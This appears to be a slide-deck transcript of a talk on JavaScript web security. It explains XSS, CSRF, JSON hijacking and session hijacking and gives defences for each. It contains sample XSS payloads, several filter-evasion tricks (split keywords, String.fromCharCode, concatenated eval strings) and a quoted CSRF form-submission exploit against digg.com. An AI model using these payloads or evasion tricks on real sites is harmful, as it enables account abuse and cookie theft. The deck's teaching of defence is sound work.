JavaScript Security

Loading...

Flash Player 9 (or above) is needed to view presentations.
We have detected that you do not have it on your computer. To install it, go here.

0 comments

Post a comment

    Post a comment
    Embed Video
    Edit your comment Cancel

    11 Favorites

    JavaScript Security - Presentation Transcript

    1. JavaScript Security jason harwig
    2. \"How dangerous could this silly little toy scripting language running inside a browser be?\" Jeff Atwood codinghorror.com stackoverflow.com
    3. “JavaScript's biggest weakness is that it is not secure.” douglas crockford
    4. \".. nine out of 10 websites still have serious vulnerabilities. . (XSS) as the top vulnerability class\" WhiteHat Security Website Security Statistic Report
    5. OWASP Top 10 2007 1. XSS 6. Information Leakage 2. Injection Flaws 7. Broken Auth 3. File Exec 8. Insecure Crypto 4. Direct Object 9. Insecure Reference Communications 5. CSRF 10.Failure to restrict URL access
    6. browser limitations
    7. javascript IO • Ajax • Image • iFrame • Source script • Bridge to flash, Java applets
    8. var xhr = new XmlHttpRequest(); xhr.open(...)
    9. NIC Server Google * get or post
    10. var image = new Image(); image.src = url; * can detect connection success failure
    11. NIC Server Google * get requests only | onload | onerror
    12. f = document.createElement('iframe'); f.src = url; document.body.appendChild(f); * only if same domain
    13. NIC Server Google * get requests only
    14. s = document.createElement('script'); s.type = 'text/javascript'; s.src= url; document.body.appendChild(s); * if JSON returned
    15. NIC Server Google * get requests only
    16. f = document.createElement('form'); f.method = 'post'; ... f.submit();
    17. NIC Server Google * get or post
    18. white hat • Mashup / Aggregate content • SSO Solutions • Protect users / application integrity
    19. black hat • XSS • CSRF • JSON hi-jacking • Cookie session hijacking • Internal network scanning • History checking
    20. cross-site scripting
    21. Browser IFrame same origin policy
    22. user input escape it!
    23. XSS Flavors • Type 0 - DOM • Type 1 - Non-Persistant • Type 2 - Persistant
    24. type 0 var p = location.href.params; document.body.innerHTML = p
    25. Type 1 Search: <script>alert('xss');</script>
    26. Type 2 Please enter username: <script>alert('xss');</script>
    27. <c:out value=\"${var}\" Your Username: <script>alert('xss');</script> escapeXml=\"true\"/>
    28. html filtering
    29. samy is my hero from http://fast.info/myspace/
    30. Friend Requests 7,000 5,250 3,500 1,750 0 12:34pm 1:30am 8:35am 9:30am 10:30am 1:30pm
    31. tag/attribute whitelist <div style=\"background:url( 'javascript:alert('xss')' )\">
    32. 'javascript' stripped <div style=\"background:url( 'java\\nscript:alert('xss')' )\">
    33. \\\" stripped String.fromCharCode(34);
    34. innerHTML stripped eval('document.body.inne' + 'rHTML');
    35. onreadystatechange stripped eval('xmlhttp.onread' + 'ystatechange = callback');
    36. to be continued..
    37. alternatives to escaping?
    38. google caja / ADsafe
    39. attack vectors to prevent?
    40. code evaluation eval('alert(document.cookie)'); (new Function('alert(document.cookie)'))();
    41. code eval continued <iframe src=\"java&#65533;script:alert('xss')\"> </iframe>
    42. poluting global objects try { throw EvilArrayFunction; } catch (Array) { }
    43. xss lessons • Escape XML
    44. cross site request forgery the new kid
    45. NIC Server Google
    46. Digg.com • “digg” a story while logged in • Cookie authentication • known url, parameters
    47. digg exploit code mf = window.frames[\"myframe\"]; html = '<form name=\"diggform\" \\ action=\"http://digg.com/diginfull\" method=\"post\">'; html = html+'<input type=\"text\" name=\"id\" value=\"367034\"/>'; html = html+'<input type=\"text\" name=\"orderchange\" value=\"2\"/>'; html = html+'<input type=\"text\" name=\"category\" value=\"0\"/>'; html = html+'<input type=\"text\" name=\"page\" value=\"0\"/>'; html = html+'<input type=\"text\" name=\"t\" value=\"undefined\"/>'; html = html+'<input type=\"text\" name=\"row\" value=\"1\"/>'; html = html+'</form>'; mf.document.body.innerHTML = html; mf.document.diggform.submit(); from http://4diggers.blogspot.com/
    48. Fixes? • Referral checking? • quick cookie expiration? • post?
    49. solved session.setAttribute(\"token\", token); <input type=\"hidden\" value=\"${token}\"/>
    50. double submit cookie
    51. digg link <a href=\"javascript:dig([num],[id],[digCheck])\">digg it</a>
    52. digg submit js new Ajax.Request(\"/diginfull\", { \"method\": \"post\", \"parameters\": \"id=\" + itemd + \"&row=\" + row + \"&digcheck=\" + digcheck + \"&type=\" + type + \"&loc=\" + pagetype });
    53. no diggcheck, no digg
    54. digg.com • Added random hash as post parameter • server verifies request
    55. myspace • used hash in post to add friends • XSS vulnerable so the hash could be retrieved
    56. HDIV • HTTP Data Integrity Validator
    57. rsnake joins twitter
    58. crossdomain.xml <?xml version=\"1.0\" encoding=\"UTF-8\"?> <cross-domain-policy xmlns:xsi=\"http://www.w3.org/2001/ XMLSchema-instance\" xsi:noNamespaceSchemaLocation=\"http:// www.adobe.com/xml/schemas/PolicyFile.xsd\"> <allow-access-from domain=\"*.twitter.com\" /> <site-control permitted-cross-domain-policies=\"master-only\"/> <allow-http-request-headers-from domain=\"*.twitter.com\" headers=\"*\" secure=\"true\"/> </cross-domain-policy>
    59. http://www.yourminis.com/search_minis.aspx?q=XSS
    60. stealing your gmail contacts
    61. google contacts url contacts?out=js&callback=google
    62. responseText google ({ Success: true, Errors: [], Body: { Contacts: [ { id, email, etc. } ] } });
    63. google’s solution? • responseXml
    64. lessons • Protect high value forms • CANNOT be stopped if site is vulnerable to XSS
    65. json hijacking
    66. new Ajax.Request('secretStuff', { onSuccess: doWork }); // server responds with [ { sensitive_info: '...' }, { sensitive_info: '...' } ]
    67. So how do I do it? • Override Array • Source script
    68. demo
    69. solved /*-secure- [ { sensitive_info: '...' }, { sensitive_info: '...' } ] */
    70. “solved” continued • protect JSON services behind post
    71. lessons • Many experts recommend JSON services shouldn’t serve sensitive data • use secure comment • responseXml as alternative
    72. Session hijacking
    73. demo
    74. internal network penetration
    75. history hijack
    76. demo
    77. resources \"Security Now! Podcast\" \"Fortify\" twit.tv/sn fortifysoftware.com/security- resources/ \"WhiteHat Security\" whitehatsec.com \"XSS Generator\" ha.ckers.org/xss.html \"Jeremiah Grossman Blog\" jeremiahgrossman.blogspot.com \"Samy is my Hero\" fast.info/myspace \"Digg Hack\" 4diggers.blogspot.com \"HDIV\" hdiv.org
    78. twitter: jharwig jason.harwig@nearinfinity.com nearinfinity.com/blogs careers@nearinfinity.com 81

    + Jason HarwigJason Harwig, 3 years ago

    custom

    9170 views, 11 favs, 7 embeds more stats

    JavaScript, as it is today, is an insecure language more

    More info about this document

    © All Rights Reserved

    Go to text version

    • Total Views 9170
      • 8870 on SlideShare
      • 300 from embeds
    • Comments 0
    • Favorites 11
    • Downloads 301
    Most viewed embeds
    • 273 views on http://www.nearinfinity.com
    • 14 views on http://www.nofluffjuststuff.com
    • 6 views on http://nearinfinity.com
    • 3 views on http://static.slideshare.net
    • 2 views on http://server1.webkicks.de

    more

    All embeds
    • 273 views on http://www.nearinfinity.com
    • 14 views on http://www.nofluffjuststuff.com
    • 6 views on http://nearinfinity.com
    • 3 views on http://static.slideshare.net
    • 2 views on http://server1.webkicks.de
    • 1 views on http://www.feedhaus.com
    • 1 views on http://www.therichwebexperience.com

    less

    Flagged as inappropriate Flag as inappropriate
    Flag as inappropriate

    Select your reason for flagging this presentation as inappropriate. If needed, use the feedback form to let us know more details.

    Cancel
    File a copyright complaint
    Having problems? Go to our helpdesk?

    Categories